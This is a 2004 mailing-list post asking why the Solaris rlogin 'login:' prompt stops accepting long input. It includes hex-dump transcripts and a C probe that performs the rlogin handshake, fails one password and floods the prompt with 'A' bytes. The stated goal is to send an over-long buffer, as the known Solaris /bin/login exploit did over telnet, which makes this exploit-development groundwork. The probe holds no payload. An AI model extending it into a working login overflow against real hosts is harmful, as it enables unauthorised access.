Problem rlogin protocol
From: Inode <inode () mediaservice net>
Date: Fri, 02 Apr 2004 15:33:02 +0200
Hi all, I'm playing with the rlogin protocol under Solaris (though I think the behaviour is similar on other Unix systems), and I have run into a problem.
When I send more than roughly 250 bytes as the login name, the daemon stops accepting input and answers every further byte with 0x07 (BEL) instead of echoing it. (A fixed cap of about 256 bytes followed by a bell is what a pty in canonical mode does once its input line reaches MAX_CANON, so the limit may well come from the terminal that login reads the "login:" prompt through rather than from rlogind or the rlogin protocol itself; the name supplied in the initial rlogin handshake never passes through that prompt.) I know that with the telnet protocol there are option negotiations that allow a long buffer to be sent without any problem (as in the Solaris /bin/login exploit); how can the same be achieved over rlogin?
Attached is a small example that reproduces the problem. Thanks. Best regards, Inode

root# ./y 192.168.1.50 inode 2
[+] Connected to 192.168.1.50...
/* start, 1 bytes */
00 | .
/* Reply, 1 bytes */
00 | .
/* Rlogin init, 23 bytes */
69 6e 6f 64 65 00 69 6e 6f 64 65 00 76 74 31 30 | inode.inode.vt10
30 2f 39 36 30 30 00 | 0/9600.
/* rec, 10 bytes */
50 61 73 73 77 6f 72 64 3a 20 | Password:
/* rec, 2 bytes */
0d 0a | ..
/* rec, 17 bytes */
4c 6f 67 69 6e 20 69 6e 63 6f 72 72 65 63 74 0d | Login incorrect.
0a | .
/* rec, 7 bytes */
6c 6f 67 69 6e 3a 20 | login:
/* rec, 10 bytes */
41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAA
/* rec, 10 bytes */
41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAA
/* rec, 2 bytes */
0d 0a | ..
/* rec, 10 bytes */
50 61 73 73 77 6f 72 64 3a 20 | Password:
root#
root# ./y 192.168.1.50 inode 26
[+] Connected to 192.168.1.50...
/* start, 1 bytes */
00 | .
/* Reply, 1 bytes */
00 | .
/* Rlogin init, 23 bytes */
69 6e 6f 64 65 00 69 6e 6f 64 65 00 76 74 31 30 | inode.inode.vt10
30 2f 39 36 30 30 00 | 0/9600.
/* rec, 10 bytes */
50 61 73 73 77 6f 72 64 3a 20 | Password:
/* rec, 2 bytes */
0d 0a | ..
/* rec, 17 bytes */
4c 6f 67 69 6e 20 69 6e 63 6f 72 72 65 63 74 0d | Login incorrect.
0a | .
/* rec, 7 bytes */
6c 6f 67 69 6e 3a 20 | login:
/* rec, 10 bytes */
41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAA
/* rec, 10 bytes */
41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAA
/* rec, 10 bytes */
41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAA
/* rec, 10 bytes */
41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAA
[...]
41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAA
/* rec, 10 bytes */
41 41 41 41 41 41 41 07 07 07 | AAAAAAA...
/* rec, 1 bytes */
07 | .
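/* Inode_ <inode () deadlocks info> */
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <netdb.h>
#include <fcntl.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * rlogin login-prompt length probe (companion to the mailing-list post).
 *
 *   ./y <target-ipv4> <username> <count>
 *
 * Connects to TCP/513 on the target from a reserved (<1024) source port,
 * performs the rlogin client handshake, fails one password on purpose so the
 * server falls back to an interactive "login:" prompt, then writes <count>
 * ten-byte chunks of 'A' at that prompt and hex-dumps every reply.
 *
 * Everything sent on the wire is either a fixed string or taken from argv;
 * nothing is executed remotely.  Note that every run leaves one failed login
 * for <username> in the target's logs.  Binding a source port below 1024
 * needs root, as in the original session transcript.
 */

/* Prototypes */
void hexdump(char *desc, unsigned char *data, unsigned int amount);
int connect_m(unsigned long ip, unsigned short int port);

/* Defines */
#define RLOGIN_PORT 513
#define VERSION "0.00"

/* Byte strings sent on the wire. */
#define TERM_SPEED    "vt100/9600"   /* terminal/speed field of the handshake */
#define FAKE_PASSWORD "sarca\n"      /* deliberately wrong password */
#define FILL_CHUNK    "AAAAAAAAAA"   /* ten bytes written per loop iteration */

/* Size of the single receive/scratch buffer in main(). */
#define RECV_BUF_SIZE 4000

unsigned int envcount = 0;   /* unused here; kept so the file's globals are unchanged */

/*
 * Write exactly len bytes to fd, retrying on short writes and EINTR.
 * Returns 0 on success, -1 (errno set) on error.  The original called
 * write() once and ignored its result.
 */
static int send_all(int fd, const void *buf, size_t len)
{
    const unsigned char *p = buf;

    while (len > 0) {
        ssize_t n = write(fd, p, len);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        p += (size_t)n;
        len -= (size_t)n;
    }
    return 0;
}

/*
 * Read one chunk from fd into buf and hex-dump it under desc.
 * Returns the byte count read (0 = peer closed the connection), or -1
 * (errno set) on error.  A failed read() is never forwarded to hexdump
 * as a negative length, which the original did (read() returning -1
 * became an "amount" of ~4 billion and an out-of-bounds walk of buf).
 */
static ssize_t recv_dump(int fd, char *desc, unsigned char *buf, size_t size)
{
    ssize_t n;

    do {
        n = read(fd, buf, size);
    } while (n < 0 && errno == EINTR);

    if (n < 0) {
        perror("read");
        return -1;
    }
    if (n == 0) {
        fprintf(stderr, "[-] Connection closed by peer while waiting for %s\n", desc);
        return 0;
    }
    hexdump(desc, buf, (unsigned int)n);
    return n;
}

/*
 * Parse a non-negative decimal chunk count from argv.
 * Returns -1 for an empty string, trailing garbage, overflow or a
 * negative value; atoi() in the original silently yielded 0 or garbage.
 */
static long parse_count(const char *s)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE || v < 0)
        return -1;
    return v;
}

/*
 * Entry point: see the file header for the argument contract.
 *
 * Each server message is read with a single read() and assumed to arrive
 * on its own; that matched the transcript in the post but is not something
 * TCP guarantees, so a coalesced or split message will shift the dump
 * labels.  Returns EXIT_SUCCESS when the whole exchange completed, and
 * EXIT_FAILURE on bad arguments or any socket error.
 */
int main(int argc, char **argv)
{
    int fd;
    char *host;
    char *username;
    long count;
    long i;
    size_t ulen;
    size_t hlen;
    unsigned char buffer[RECV_BUF_SIZE];
    unsigned char *pointer;
    struct in_addr target;

    if (argc != 4) {
        fprintf(stderr, "usage: %s <host-ipv4> <username> <count>\n",
                argv[0] ? argv[0] : "y");
        return EXIT_FAILURE;
    }
    host = argv[1];
    username = argv[2];

    count = parse_count(argv[3]);
    if (count < 0) {
        fprintf(stderr, "[-] Invalid count '%s'\n", argv[3]);
        return EXIT_FAILURE;
    }

    /* inet_addr() in the original returned INADDR_NONE for garbage and connected to it. */
    if (inet_pton(AF_INET, host, &target) != 1) {
        fprintf(stderr, "[-] Invalid IPv4 address '%s'\n", host);
        return EXIT_FAILURE;
    }

    /*
     * The handshake holds two NUL-terminated copies of the name plus the
     * terminal field; bound it so an over-long argv[2] cannot run past the
     * 4000-byte buffer as it could in the original.
     */
    ulen = strlen(username);
    if (2 * (ulen + 1) + sizeof(TERM_SPEED) > sizeof(buffer)) {
        fprintf(stderr, "[-] Username of %zu bytes does not fit the handshake buffer\n", ulen);
        return EXIT_FAILURE;
    }

    fprintf(stderr, "[ ] Connecting to %s...", host);
    fflush(stderr);
    /* connect_m() takes the address in host byte order. */
    fd = connect_m(ntohl((unsigned long)target.s_addr), RLOGIN_PORT);
    if (fd < 0) {
        fprintf(stderr, "\r[-] Error on connecting\n");
        return EXIT_FAILURE;
    }
    fprintf(stderr, "\r[+] Connected to %s...\t\n", host);

    /* rlogin client handshake: a single NUL byte, answered by a NUL from the server. */
    hexdump("start", (unsigned char *)"\x00", 1);
    if (send_all(fd, "\x00", 1) < 0)
        goto fail;
    if (recv_dump(fd, "Reply", buffer, sizeof(buffer)) <= 0)
        goto fail;

    /* Then "client-user\0server-user\0terminal/speed\0". */
    pointer = buffer;
    memcpy(pointer, username, ulen + 1);
    pointer += ulen + 1;
    memcpy(pointer, username, ulen + 1);
    pointer += ulen + 1;
    memcpy(pointer, TERM_SPEED, sizeof(TERM_SPEED));
    pointer += sizeof(TERM_SPEED);
    hlen = (size_t)(pointer - buffer);
    hexdump("Rlogin init", buffer, (unsigned int)hlen);
    if (send_all(fd, buffer, hlen) < 0)
        goto fail;

    /* Server prompts for the password of the user named in the handshake. */
    if (recv_dump(fd, " rec", buffer, sizeof(buffer)) <= 0)
        goto fail;

    /* Fail that password on purpose so the server falls back to "login:". */
    if (send_all(fd, FAKE_PASSWORD, strlen(FAKE_PASSWORD)) < 0)
        goto fail;
    /* Transcript: CRLF, then "Login incorrect", then the "login: " prompt. */
    if (recv_dump(fd, " rec", buffer, sizeof(buffer)) <= 0)
        goto fail;
    if (recv_dump(fd, " rec", buffer, sizeof(buffer)) <= 0)
        goto fail;
    if (recv_dump(fd, " rec", buffer, sizeof(buffer)) <= 0)
        goto fail;

    /* Feed the login prompt <count> ten-byte chunks, dumping what comes back each time. */
    for (i = 0; i < count; i++) {
        if (send_all(fd, FILL_CHUNK, strlen(FILL_CHUNK)) < 0)
            goto fail;
        if (recv_dump(fd, " rec", buffer, sizeof(buffer)) <= 0)
            goto fail;
    }

    /* Terminate the name and collect the two replies the transcript shows. */
    if (send_all(fd, "\n", 1) < 0)
        goto fail;
    if (recv_dump(fd, " rec", buffer, sizeof(buffer)) <= 0)
        goto fail;
    if (recv_dump(fd, " rec", buffer, sizeof(buffer)) <= 0)
        goto fail;

    close(fd);
    return EXIT_SUCCESS;

fail:
    close(fd);
    return EXIT_FAILURE;
}

/*
 * Open a TCP connection to ip:port (both in host byte order) from a
 * reserved source port, as rlogind requires of its clients.
 *
 * The source port is searched downwards from 1023 while bind() reports
 * EADDRINUSE; any other failure (typically EACCES when not root) aborts.
 * The connect is done non-blocking with a 30 s timeout and the socket is
 * handed back in blocking mode.  Returns the connected socket, or -1 on
 * any failure (the original exit(0)'d from inside the bind loop, and left
 * the socket non-blocking when connect() succeeded immediately).
 */
int connect_m(unsigned long ip, unsigned short int port)
{
    int sock;
    int flags_old;
    int bound;
    int so_error;
    unsigned int src_port;
    socklen_t optlen;
    struct sockaddr_in sin;
    struct sockaddr_in in_s;
    struct timeval tv;
    fd_set wfds;

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock < 0) {
        perror("socket");
        return -1;
    }

    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = htonl((in_addr_t)ip);
    sin.sin_port = htons(port);

    /*
     * Bind to a port < 1024.  The original decremented the already
     * byte-swapped sin_port, which walks the wrong ports on little-endian
     * hosts; keep the counter in host order and convert on each try.
     */
    memset(&in_s, 0, sizeof(in_s));
    in_s.sin_family = AF_INET;
    in_s.sin_addr.s_addr = htonl(INADDR_ANY);
    bound = 0;
    for (src_port = 1023; src_port > 0 && !bound; src_port--) {
        in_s.sin_port = htons((unsigned short)src_port);
        if (bind(sock, (struct sockaddr *)&in_s, sizeof(in_s)) == 0)
            bound = 1;
        else if (errno != EADDRINUSE)
            break;   /* not a "port busy" error: retrying cannot help */
    }
    if (!bound) {
        fprintf(stderr, "Can't bind port <1024: %s\n", strerror(errno));
        close(sock);
        return -1;
    }

    /* Non-blocking connect so the attempt can be bounded by a timeout. */
    flags_old = fcntl(sock, F_GETFL, 0);
    if (flags_old < 0 || fcntl(sock, F_SETFL, flags_old | O_NONBLOCK) < 0) {
        perror("fcntl");
        close(sock);
        return -1;
    }

    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        if (errno != EINPROGRESS) {
            perror("connect");
            close(sock);
            return -1;
        }

        if (sock >= FD_SETSIZE) {   /* FD_SET on a larger fd is undefined */
            close(sock);
            return -1;
        }
        tv.tv_sec = 30;
        tv.tv_usec = 0;
        FD_ZERO(&wfds);
        FD_SET(sock, &wfds);
        if (select(sock + 1, NULL, &wfds, NULL, &tv) <= 0) {
            /* 0 is a timeout, <0 an error; neither leaves a usable socket. */
            close(sock);
            return -1;
        }

        /* Writable means the connect finished; SO_ERROR says whether it succeeded. */
        so_error = 0;
        optlen = sizeof(so_error);
        if (getsockopt(sock, SOL_SOCKET, SO_ERROR, &so_error, &optlen) < 0 || so_error != 0) {
            close(sock);
            return -1;
        }
    }

    /* Restore blocking mode on every success path, including the immediate one. */
    if (fcntl(sock, F_SETFL, flags_old) < 0) {
        perror("fcntl");
        close(sock);
        return -1;
    }
    return sock;
}

/*
 * Print amount bytes of data to stderr as a 16-per-row hex dump under a
 * comment-style heading that names desc and the byte count.
 *
 * Bytes 0x20..0x7e appear as themselves in the right-hand column and every
 * other byte as '.', so server output is never written raw to the terminal
 * (the BEL in the transcript shows as 0x07 and '.').  Two fixes against the
 * original: the heading now goes to stderr with the rows (stdout/stderr
 * interleaving reordered it under a pipe), and a short final row is padded
 * three columns per missing byte so the '|' lines up with full rows.
 */
void hexdump(char *desc, unsigned char *data, unsigned int amount)
{
    unsigned int row;

    fprintf(stderr, "/* %s, %u bytes */\n", desc, amount);

    for (row = 0; row < amount; row += 16) {
        unsigned int n = amount - row;
        unsigned int col;

        if (n > 16)
            n = 16;

        for (col = 0; col < 16; col++) {
            if (col < n)
                fprintf(stderr, "%02x ", data[row + col]);
            else
                fputs("   ", stderr);
            if (col == 7)
                fputc(' ', stderr);   /* mid-row gap, as in the original layout */
        }
        fputs(" | ", stderr);
        for (col = 0; col < n; col++) {
            unsigned char c = data[row + col];
            fputc((c >= 0x20 && c <= 0x7e) ? c : '.', stderr);
        }
        fputc('\n', stderr);
    }
    fflush(stderr);
}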